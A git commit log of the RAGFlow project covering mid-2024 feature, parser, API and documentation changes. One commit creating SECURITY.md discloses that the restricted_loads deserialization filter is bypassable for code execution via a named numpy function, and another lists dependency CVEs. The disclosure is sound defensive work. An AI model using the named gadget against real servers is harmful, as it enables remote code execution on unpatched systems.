Add components: Baidu, Duckduckgo

### Type of change
- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 16:14:32 +08:00
edc61e9b4c feat: save the parameters of the generate operator to the form field … (#1390)
### What problem does this PR solve?
feat: save the parameters of the generate operator to the form field of
the node #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 15:52:24 +08:00
472fcba7af feat: save graph data before opening the debug drawer #918 (#1387)
### What problem does this PR solve?
feat: save graph data before opening the debug drawer #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 14:16:03 +08:00
74ec3bc4d9 feat: add GraphAvatar to graph list #918 (#1385)
### What problem does this PR solve?

feat: add GraphAvatar to graph list #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 11:04:19 +08:00
a3f4258cfc feat: click on a blank area of ​​the canvas to hide the form drawer #918 (#1384)
### What problem does this PR solve?
feat: click on a blank area of ​​the canvas to hide the form drawer #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 10:44:14 +08:00
GYH
cf542e80b3 Add Graph Baidusearch and dsl_example (#1378)
### What problem does this PR solve?

#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 09:50:57 +08:00
957cd55e4a feat: deleting a node does not require a confirmation box to pop up #918 (#1380)
### What problem does this PR solve?

feat: deleting a node does not require a confirmation box to pop up #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 19:32:47 +08:00
25a8c076bf feat: add description text to operators and extract the useFetchModelId to logicHooks.ts and drag the operator to the canvas and initialize the form data #918 (#1379)
### What problem does this PR solve?

feat: add description text to operators #918 
feat: drag the operator to the canvas and initialize the form data #918
feat: extract the useFetchModelId to logicHooks.ts
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 19:18:02 +08:00
306108fe0e API: Download doc api (#1354)
### What problem does this PR solve?

Adds download_document api

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 16:33:55 +08:00
daaf6aed50 feat: replace the graph icon in the header #918 (#1376)
### What problem does this PR solve?

feat: replace the graph icon in the header #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 16:31:34 +08:00
3b50389ee7 feat: add graph tab to header #918 (#1374)
### What problem does this PR solve?

feat: add graph tab to header #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 16:26:20 +08:00
258c9ea644 add keyword extraction in graph (#1373)
### What problem does this PR solve?
#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 15:57:25 +08:00
acd78c5ef2 feat: build nodes and edges from chat bot dsl #918 (#1372)
### What problem does this PR solve?
feat: build nodes and edges from chat bot dsl #918


### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 15:15:14 +08:00
1d3e4844a5 feat: call the reset api before opening the run drawer each time #918 (#1370)
### What problem does this PR solve?

feat:  call the reset api before opening the run drawer each time #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 15:10:45 +08:00
4122695a1a refine templates of graph (#1368)
### What problem does this PR solve?

#918 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 10:33:49 +08:00
3ccb62910b fix: add icon to MiniMax and Mistral #1353 (#1367)
### What problem does this PR solve?

fix: add icon to MiniMax  and Mistral #1353
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-04 10:24:43 +08:00
a6765e9ca4 Integrates LLM Azure OpenAI (#1318)
### What problem does this PR solve?

feat: Integrates LLM Azure OpenAI #716 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

### Other
It's just the back-end code, the front-end needs to provide the Azure
OpenAI model addition form.
   
#### Required parameters

- base_url
- api_key

---------

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-07-04 09:57:16 +08:00
dec3bf7503 feat: pull the message list after sending the message successfully #918 (#1364)
### What problem does this PR solve?

feat: pull the message list after sending the message successfully #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-04 09:55:08 +08:00
745e98e56a feat: create blank canvas #918 (#1356)
### What problem does this PR solve?

feat: create blank canvas #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 17:06:48 +08:00
1defc83506 API: create update_doc method (#1341)
### What problem does this PR solve?

Adds the API method of updating documents.


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 15:14:34 +08:00
65e59862e4 feat: create flow from dsl template #918 (#1351)
### What problem does this PR solve?

feat: create flow from  dsl template #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 14:42:48 +08:00
477a52620f feat: build nodes and edges from customer_service dsl #918 (#1348)
### What problem does this PR solve?

feat: build nodes and edges from customer_service dsl #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 14:03:25 +08:00
7c9ea5cad9 add interpreter to graph (#1347)
### What problem does this PR solve?

#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 12:15:15 +08:00
f6159ee4d3 feat: add DynamicParameters #918 (#1346)
### What problem does this PR solve?

feat: add DynamicParameters #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 12:00:56 +08:00
a7423e3a94 feat: add RelevantForm #918 (#1344)
### What problem does this PR solve?

feat: add RelevantForm #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-03 10:15:19 +08:00
25c4c717cb Add Intel IPEX-LLM setup under deploy_local_llm (#1269)
### What problem does this PR solve?

It adds the setup guide for using Intel IPEX-LLM with Ollama to
docs/guide/deploy_local_llm.md

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe): adds the setup guide for using Intel
IPEX-LLM with Ollama to docs/guide/deploy_local_llm.md
2024-07-02 18:55:24 +08:00
f9adeb9647 feat: add CreateFlowModal #918 (#1343)
### What problem does this PR solve?

feat: add CreateFlowModal #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-02 16:15:54 +08:00
04487d1bce feat: customize edge arrow #918 (#1338)
### What problem does this PR solve?

feat: customize edge arrow #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-02 11:43:57 +08:00
68b9a857c2 Doc: added doc for three doc methods (#1336)
### What problem does this PR solve?

Adds the documentation for three newly added API methods for content
management.

### Type of change

- [x] Documentation Update
2024-07-02 09:57:44 +08:00
5fa3c2bdce feat: modify the style of the operator #918 (#1335)
### What problem does this PR solve?

feat: modify the style of the operator #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 18:58:51 +08:00
b5389f487c API: created list_doc (#1327)
### What problem does this PR solve?

Adds the api of listing documentation.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 18:15:00 +08:00
8b1c145e56 feat: modify the name of an operator #918 (#1333)
### What problem does this PR solve?

feat: modify the name of an operator #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 17:12:04 +08:00
92e9320657 upgrade laws parser of docx (#1332)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-07-01 15:50:24 +08:00
5eb21b9c7c feat: construct the edge of the classification operator from dsl #918 (#1329)
### What problem does this PR solve?

feat: construct the edge of the classification operator from dsl #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 14:37:05 +08:00
4542346f18 feat: get the operator type from id #918 (#1323)
### What problem does this PR solve?

feat: get the operator type from id #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-01 10:27:32 +08:00
fc7cc1d36c Optimize docx handle method in laws parser (#1302)
### What problem does this PR solve?

Optimize docx handle method in laws parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 17:42:59 +08:00
751447bd4f fix: fixed the issue where spaces could not be entered in the message… (#1320)
### What problem does this PR solve?

fix: fixed the issue where spaces could not be entered in the message
input box #1314
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-28 17:32:38 +08:00
f26d01dfa3 feat: add RelevantForm #918 (#1313)
### What problem does this PR solve?

feat: add RelevantForm #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 17:22:10 +08:00
cd3c739982 feat: add MessageForm #918 (#1312)
### What problem does this PR solve?

feat: add MessageForm #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 16:25:20 +08:00
44c7a0e281 feat: translate fields of CategorizeForm #918 (#1311)
### What problem does this PR solve?

feat: translate fields of CategorizeForm #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 15:29:29 +08:00
8c9b54db31 API: completed delete_doc api (#1290)
### What problem does this PR solve?

Adds the functionality of deleting documentation

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 14:27:57 +08:00
6a7c2112f7 feat: limit there to be only one line between two nodes #918 (#1310)
### What problem does this PR solve?

feat: limit there to be only one line between two nodes #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 12:01:06 +08:00
0acf4194ca feat: filter out selected values ​​in other to fields from the curren… (#1307)
### What problem does this PR solve?

feat: filter out selected values ​​in other to fields from the current
drop-down box options #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 11:40:21 +08:00
89004f1faf Update README.md (#1285)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-28 09:00:20 +08:00
5a36866cf2 feat: fix the problem of form entries being deleted when adding a new line #918 and clear the selection box to delete the corresponding edge (#1301)
### What problem does this PR solve?
feat: clear the selection box to delete the corresponding edge. #918
feat: fix the problem of form entries being deleted when adding a new
line #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-28 08:59:51 +08:00
c8523dc6fd Introduce new features (#1296)
### What problem does this PR solve?

Update README to introduce new features

### Type of change

- [x] Documentation Update
2024-06-27 18:09:59 +08:00
840e921e96 feat: set the edge as the data source to achieve two-way linkage betw… (#1299)
### What problem does this PR solve?

feat: set the edge as the data source to achieve two-way linkage between
the edge and the to field. #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 18:09:02 +08:00
5a1e01d96f feat: delete the edge on the classification node anchor when the anch… (#1297)
### What problem does this PR solve?

feat: delete the edge on the classification node anchor when the anchor
is connected to other nodes #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 15:48:11 +08:00
fbb8cbfc67 feat: restrict classification operators cannot be connected to Answer and other classification #918 (#1294)
### What problem does this PR solve?

feat: restrict classification operators cannot be connected to Answer
and other classification #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 14:57:40 +08:00
0ce720a247 fix mem leak for local reranker (#1295)
### What problem does this PR solve?

#1288
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-27 14:57:24 +08:00
47926a95ae Fix ragflow may encounter an OOM (Out Of Memory) when there are a lot of conversations (#1292)
### What problem does this PR solve?

Fix ragflow may encounter an OOM (Out Of Memory) when there are a lot of
conversations.
#1288

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: zhuhao <zhuhao@linklogis.com>
2024-06-27 14:48:49 +08:00
ff8793a031 Update sdk readme (#1291)
### What problem does this PR solve?

Polish grammar.

### Type of change

- [x] Documentation Update
2024-06-27 14:41:52 +08:00
a95c1d45f0 Support table for markdown file in general parser (#1278)
### What problem does this PR solve?

Support extracting table for markdown file in general parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 14:38:35 +08:00
45853505bb Fix occasional errors in pdf table recognition (#1277)
### What problem does this PR solve?

Fix occasional errors in pdf table recognition

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-27 14:37:58 +08:00
b3f782b3d3 Fix dependency conflict (#1293)
### What problem does this PR solve?

Fix dependency conflict

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-27 14:36:49 +08:00
16a1d24a02 Update README.md (#1286)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-27 13:38:36 +08:00
a943aefa4d feat: use useUpdateNodeInternals to solve the issue that the newly ad… (#1287)
### What problem does this PR solve?

feat: use useUpdateNodeInternals to solve the issue that the newly added
anchor points cannot be connected. #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 11:29:46 +08:00
038ca8c0ea docs: update quickstart.mdx (#1283)
### What problem does this PR solve?

minor fix

### Type of change

- [x] Documentation Update
2024-06-27 09:20:42 +08:00
fa5695c250 feat: add CategorizeHandle #918 (#1282)
### What problem does this PR solve?

feat: add CategorizeHandle #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-27 09:20:19 +08:00
e43208a1ca feat: change nodes to circular #918 (#1279)
### What problem does this PR solve?
feat: change nodes to circular #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-26 16:57:38 +08:00
fef663a59d feat: build categorize list from object #918 (#1276)
### What problem does this PR solve?

feat: build categorize list from object #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 19:28:24 +08:00
83b91d90fe feat: add DynamicCategorize #918 (#1273)
### What problem does this PR solve?

feat: add DynamicCategorize #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 16:17:12 +08:00
f6ae8fcb71 API: upload document api (#1264)
### What problem does this PR solve?

API: Adds the feature of uploading document.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 12:16:28 +08:00
d1ea429bdd feat: add LLMSelect (#1270)
### What problem does this PR solve?

feat: add LLMSelect #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-25 12:09:07 +08:00
b75bb1d8d3 Support displaying tables in the chunks of pdf file when using QA parser (#1263)
### What problem does this PR solve?

Support displaying tables in the chunks of pdf file when using QA parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 19:02:18 +08:00
6c6f5a3a47 feat: modify the background color of chat messages (#1262)
### What problem does this PR solve?

feat: modify the background color of chat messages #1215

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 18:23:22 +08:00
80163c043e Optimized the chat interface (including the chat API after sharing) (#1215)
### What problem does this PR solve?
Optimized the chat interface (including the chat API after sharing)
1. Change the background color of the dialog box between the assistant
and the user (use the theme color of the interface)
2. Add rounded corners to the dialog box
3. When the input box is empty, you can't click the send button(because
some models will report an error when sending empty data)

Color reference(can be a bit subjective):

![image](https://github.com/infiniflow/ragflow/assets/19431702/8cd6fcd9-8ca1-4160-8bac-9e8ba1a4112e)

### Type of change

- [x] Refactor

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-06-24 16:41:45 +08:00
9fcf9a10c6 Update SECURITY.md (#1248)
### What problem does this PR solve?

### Type of change

- [x] Documentation Update
2024-06-24 16:30:17 +08:00
38bd02f402 Support displaying images in the chunks of docx files when using general parser (#1253)
### What problem does this PR solve?

Support displaying images in chunks of docx files when using general
parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 16:29:36 +08:00
9a0736b20f feat: format code before submitting it #1251 (#1252)
### What problem does this PR solve?

feat: format code before submitting it #1251 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 14:48:21 +08:00
GYH
4fcd05ad23 fix Rerank Vector Similarity Score (#1249)
### What problem does this PR solve?

#1243 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-24 12:25:50 +08:00
f8fe4154e8 Place pdf's image at the correct position in QA parser (#1235)
### What problem does this PR solve?

Place pdf's image at the correct position in QA parser

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-24 10:41:03 +08:00
57970570ee Let json files support naive parsing methods #1245 (#1247)
### What problem does this PR solve?

Let json files support naive parsing methods #1245

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 10:40:51 +08:00
d185a2e7f2 Create SECURITY.md (#1241)
### What problem does this PR solve?

The restricted_loads function at
[api/utils/init.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215)
is still vulnerable leading via code execution. The main reson is that
numpy module has a numpy.f2py.diagnose.run_command function directly
execute commands, but the restricted_loads function allows users import
functions in module numpy.

### Additional Details

[https://github.com/infiniflow/ragflow/issues/1240](https://github.com/infiniflow/ragflow/issues/1240)

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-06-24 10:14:57 +08:00
a4ea5a120b feat: grey out the team function #1221 (#1244)
### What problem does this PR solve?

Grey out the team function #1221

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-24 10:03:35 +08:00
15bf9f8c25 refine code to prevent exception (#1231)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-06-21 14:06:46 +08:00
18f4a6b35c feat: support json file (#1217)
### What problem does this PR solve?

feat: support json file.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-06-21 10:42:29 +08:00
f7cdb2678c polished doc for dataset API (#1219)
### What problem does this PR solve?

Added doc for API.

### Type of change

- [x] Documentation Update
2024-06-20 19:02:03 +08:00
3c1444ab19 Add docx support for manual parser (#1227)
### What problem does this PR solve?

Add docx support for manual parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-20 17:03:02 +08:00
fb56a29478 Add docx support for QA parser (#1213)
### What problem does this PR solve?

Add docx support for QA parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-20 16:09:09 +08:00
e99e8b93fb fix:failed to Create new Chunk in database #1159 (#1214)
### What problem does this PR solve?

fix bug: [1159](https://github.com/infiniflow/ragflow/issues/1159)
using embd which user configured at knowledgebase when create new chunk
in database

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-20 09:43:39 +08:00
5ec19b5f53 created get_dataset, update_dataset API and fixed: delete (#1201)
### What problem does this PR solve?

Added get_dataset and update_dataset API.
Fixed delete_dataset.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
2024-06-19 18:01:38 +08:00
0b90aab22c fix: using embd which user configured at knowledgebase (#1163)
### What problem does this PR solve?
as title
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-19 14:44:25 +08:00
fe1805fa0e add README to graph (#1211)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-06-19 13:05:32 +08:00
f73f7b969c Update requirements_dev.txt 2024-06-19 08:50:32 +08:00
81d1c5a695 Update requirements.txt 2024-06-19 08:50:01 +08:00
8d667d5abd fixed: duplicate name (#1202)
### What problem does this PR solve?

Duplicate method name.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-18 16:28:46 +08:00
01ad2e5296 [doc] Hid new API doc on docusaurus site (#1198)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change
- [x] Documentation Update
2024-06-18 14:57:04 +08:00
fcdda9f8c5 Remove the visibilty of RAGFlow API (#1196)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-18 10:10:27 +08:00
e35f7610e7 fix too long query exception (#1195)
### What problem does this PR solve?

#1161 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-18 09:50:59 +08:00
7920a5c78d Add markdown support for QA parser (#1180)
### What problem does this PR solve?

Add markdown support for QA parser

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-18 09:45:13 +08:00
4d957f2d3b added api documentation and added more tests (#1194)
### What problem does this PR solve?

This PR added ragflow_api.md and more tests for API.

### Type of change

- [x] Documentation Update
- [x] Other (please describe): tests
2024-06-17 22:14:50 +08:00
a89389a05a [doc] RAGFlow's api key never expires (#1188)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-17 18:45:27 +08:00
d9a9be4b4c added documentation for api and fixed: duplicate get_dataset() (#1190)
### What problem does this PR solve?

Added the documentation for api and fixed duplicate get_dataset()
methods.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
2024-06-17 17:54:06 +08:00
6be3626372 delete_dataset method and tests created (#1186)
### What problem does this PR solve?

This PR have completed both HTTP API and Python SDK for
'delete_dataset". In addition, there are tests for it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-17 15:10:05 +08:00
1eb4caf02a create list_dataset api and tests (#1138)
### What problem does this PR solve?

This PR have completed both HTTP API and Python SDK for 'list_dataset".
In addition, there are tests for it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-17 12:19:05 +08:00
f04fb36c26 upgrade version fix security bug (#1173)
### What problem does this PR solve?

due to security problem, need updagre to fix, see bellow


### Type of change

- [x] Other (please describe):

Name| version | CVE | upgrade version
-- | -- | -- | --
PyMySQL | 1.1.0 | CVE-2024-36039 | 1.1.1
Werkzeug | 3.0.1 | CVE-2024-34069 | 3.0.3
aiohttp | 3.9.3 | CVE-2024-30251 | 3.9.4
pillow | 10.2.0 | CVE-2024-28219 | 10.3.0
2024-06-17 10:51:48 +08:00
747e69ef68 Fix Docker image building failure on MacOS (ARM architecture) (#1177)
### What problem does this PR solve?

#1164 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-17 10:46:21 +08:00
c68767acdd Fix VolcEngine BUG (#1165)
### What problem does this PR solve?
- Fix a bug for VolcEngine
- After testing, the current VolcEngine configuration also supports the
Doubao series
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-06-14 19:49:28 +08:00
4447039a4c refine doc about supporting PDF for Q&A (#1160)
### Type of change

- [x] Documentation Update

---------

Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
2024-06-14 17:09:42 +08:00
90975460af Add pdf support for QA parser (#1155)
### What problem does this PR solve?

Support extracting questions and answers from PDF files

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-14 15:12:39 +08:00
7dc39cbfa6 add support for mistral (#1153)
### What problem does this PR solve?

#433 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-14 11:32:58 +08:00
a25d32496c support graph (#1152)
### What problem does this PR solve?

#918 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-14 10:49:36 +08:00
2023fdc13e fix file preview in file management (#1151)
### What problem does this PR solve?

fix file preview in file management

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-14 10:33:59 +08:00
64c83f300a feat: duplicate node #918 (#1136)
### What problem does this PR solve?
feat: duplicate node #918


### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-13 09:09:34 +08:00
3b7b6240c3 feat: add delete menu to graph node #918 (#1133)
### What problem does this PR solve?
feat: add delete menu to graph node #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-12 17:38:41 +08:00
e05395d2a7 fix multi-modual bug (#1127)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-12 14:21:35 +08:00
169281958b feat: when a node of the graph is selected, the border of the node is highlighted. #918 (#1125)
### What problem does this PR solve?

feat: when a node of the graph is selected, the border of the node is
highlighted. #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-12 11:42:48 +08:00
abcd3d2469 refactor (#1124)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-06-12 11:02:15 +08:00
2cc89211f6 Update discord link (#1123)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-12 10:18:46 +08:00
0e3a877e5c feat: set the anchor points of all nodes to be enterable and exitable #918 (#1119)
### What problem does this PR solve?

feat: set the anchor points of all nodes to be enterable and exitable
#918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 19:31:52 +08:00
da64cfd173 [doc] Minor editorial updates. (#1115)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-11 18:42:58 +08:00
ff5ea266d2 feat: add icon to graph nodes #918 (#1117)
### What problem does this PR solve?

feat: add icon to graph nodes #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 18:01:19 +08:00
8902d92d0e feat: catch errors when sending messages #918 (#1113)
### What problem does this PR solve?

feat: catch errors when sending messages #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 15:46:12 +08:00
e28d13e3b4 Updated the doc for configuring api key (#1112)
### What problem does this PR solve?

#720 

### Type of change

- [x] Documentation Update
2024-06-11 13:52:27 +08:00
0b92f02672 feat: generate uuid with human-id #918 (#1111)
### What problem does this PR solve?

feat: generate uuid with human-id #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-11 11:58:49 +08:00
cf2f6592dd API: create dataset (#1106)
### What problem does this PR solve?

This PR have finished 'create dataset' of both HTTP API and Python SDK.
HTTP API:
```
curl --request POST --url http://<HOST_ADDRESS>/api/v1/dataset   --header 'Content-Type: application/json' --header 'Authorization: <ACCESS_KEY>' --data-binary '{
  "name": "<DATASET_NAME>"
}'
```

Python SDK:
```
from ragflow.ragflow import RAGFLow
ragflow = RAGFLow('<ACCESS_KEY>', 'http://127.0.0.1:9380')
ragflow.create_dataset("dataset1")

```

TODO: 
- ACCESS_KEY is the login_token when user login RAGFlow, currently.
RAGFlow should have the function that user can add/delete access_key.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-11 11:16:37 +08:00
97ced2f667 fix: hide web crawl menu item (#1110)
### What problem does this PR solve?

fix: hide web crawl menu item #1107

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-11 10:54:30 +08:00
7eb69fe6d9 Supports obtaining PDF documents from web pages (#1107)
### What problem does this PR solve?

Knowledge base management supports crawling information from web pages
and generating PDF documents

### Type of change
- [x] New Feature (Support document from web pages)
2024-06-11 10:45:19 +08:00
68a698655a infinity: Update embedding_model.py (#1109)
### What problem does this PR solve?

I implemented infinity, a fast vector embeddings engine. 

### Type of change


- [x] Performance Improvement
- [X] Other (please describe):
2024-06-11 08:23:58 +08:00
f900e432f3 Add redis config (#1104)
### What problem does this PR solve?

Redis post config is missing

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-08 23:24:29 +08:00
267d6b28be Update README (#1101)
### What problem does this PR solve?

Update README for build from source.

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-08 19:02:16 +08:00
706985c188 feat: add OperateDropdown and send debug message #918 (#1095)
### What problem does this PR solve?
feat: add OperateDropdown
feat: send debug message #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-07 19:27:27 +08:00
59efba3d87 add preview gif (#1097)
### What problem does this PR solve?

### Type of change

- [x] Documentation Update
2024-06-07 19:01:09 +08:00
22468a8590 [doc] Updated default value of quote in 'get answers' (#1093)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-07 14:08:59 +08:00
d0951ee27b fix: logger formater is not work (#1090)
### What problem does this PR solve?

as title

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-07 13:48:56 +08:00
31da511d1d feat: watch graph change (#1092)
### What problem does this PR solve?

feat: watch graph change #918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-07 13:46:50 +08:00
f8d0d657fb Fixed a Docusaurus display issue (#1089)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-07 10:35:25 +08:00
923c3b8cac fix bug in api (#1088)
### What problem does this PR solve?

#1075 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-07 09:56:14 +08:00
2ff1b410b9 Update .env 2024-06-07 09:09:38 +08:00
f65d6a957b Updated Ollama part of local deployment (#1066)
### What problem does this PR solve?

#720 

### Type of change

- [x] Documentation Update
2024-06-07 09:06:46 +08:00
722c342d56 fix: bug similarity() in YoudaoRerank (#1084)
### What problem does this PR solve?

bix fix

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-07 09:04:53 +08:00
dbdae8e83c feat: add FlowChatBox #918 (#1086)
### What problem does this PR solve?

feat: add FlowChatBox #918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 19:29:36 +08:00
6399a4fde2 Update README.md 2024-06-06 16:06:20 +08:00
631753f1a9 documentaion for self-rag (#1080)
